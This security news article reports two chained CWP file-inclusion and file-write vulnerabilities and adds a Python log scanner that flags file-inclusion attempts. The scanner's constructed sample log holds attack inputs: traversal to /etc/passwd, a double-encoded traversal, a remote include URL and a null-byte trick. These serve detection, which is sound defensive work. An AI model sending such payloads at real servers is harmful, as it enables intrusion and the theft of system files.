Two vulnerabilities were discovered in Control Web Panel (CWP), a widely used web hosting management platform deployed on more than 200,000 servers. The flaws could allow code execution as root on Linux servers and were discovered by Octagon Networks researcher Paulos Yibelo.
CVE-2021-45467 and CVE-2021-45466 CWP Vulnerabilities
The flaws were assigned the identifiers CVE-2021-45467 (a file inclusion bug) and CVE-2021-45466 (a file write issue). Chained together, the two vulnerabilities enable remote code execution.
More about CWP and the Attacks
CWP, previously known as CentOS Web Panel, is an open-source Linux control panel for creating and managing web hosting environments. It supports several operating systems, including CentOS, Rocky Linux, AlmaLinux, and Oracle Linux.
Both vulnerabilities were located in parts of the CWP panel that are exposed in the webroot without authentication.
"After hosting CWP on a local environment, it quickly became evident that most features require administrative or user accounts to perform. Since we are interested only in vulnerabilities that can be exploited without user authentication or interaction, we will avoid all the restricted sections and focus our research on parts of the panel that are exposed without authentication in the webroot. Turns out, not a lot is exposed," the report explained.
In the RCE scenario, an attacker exploits the flaws to pull malicious code from a remote resource by altering an include statement, the PHP construct that inserts the contents of one PHP file into another before the server executes it. The researchers will release a full proof of concept (PoC) achieving pre-authentication RCE for red teams once enough servers have migrated to the latest version.
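Defenders who cannot patch immediately usually want to know whether this bug class is being probed against their panel. The following is an added example, not code from the article or from the CWP project: it scans web server access logs for the three indicators typical of file inclusion attempts, path traversal sequences, remote URL schemes and null bytes in query parameter values, after normalising percent-encoding (including double encoding). The log lines, the `/index.php` path and the `page` parameter are constructed for illustration and are not the CWP-specific endpoints or parameters from the report.

```python
"""Flag file-inclusion style requests in web server access logs.

Added example for the bug class described above (local/remote file
inclusion via a tampered include path). Nothing here is CWP-specific:
the sample log lines, the /index.php path and the 'page' parameter are
constructed for illustration.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in combined-log style (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2022:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
203.0.113.9 - - [10/Jan/2022:10:00:02 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1024
203.0.113.9 - - [10/Jan/2022:10:00:03 +0000] "GET /index.php?page=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1024
203.0.113.7 - - [10/Jan/2022:10:00:04 +0000] "GET /index.php?page=http://198.51.100.2/x.txt HTTP/1.1" 200 64
203.0.113.7 - - [10/Jan/2022:10:00:05 +0000] "GET /index.php?page=about%00.php HTTP/1.1" 200 300
"""

# Extracts the request line: method, target (path + query) and protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads normalise too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_value(value: str) -> list[str]:
    """Return the indicator names that one (possibly encoded) value triggers."""
    indicators = []
    norm = fully_decode(value).replace("\\", "/")
    if "../" in norm or norm.endswith(".."):
        indicators.append("traversal")      # attempts to escape the include directory
    if re.match(r"^[a-z][a-z0-9+.-]*://", norm, re.IGNORECASE):
        indicators.append("remote-url")     # remote inclusion needs a URL scheme
    if "\x00" in norm:
        indicators.append("null-byte")      # classic trick to cut off an appended suffix
    return indicators

def scan_log(text: str) -> list[dict]:
    """Scan access-log text and return one finding per suspicious parameter."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        # parse_qsl decodes one layer; classify_value handles the rest.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            hits = classify_value(value)
            if hits:
                findings.append({
                    "client": line.split(" ", 1)[0],
                    "path": parts.path,
                    "param": name,
                    "indicators": hits,
                })
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Run it as a script to see the four flagged requests from the constructed log; the first benign line produces no finding. The repeated decoding matters in practice: a single `unquote` would leave `..%2f` intact and miss the double-encoded traversal on the third line.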
Full technical disclosure is available in the original report.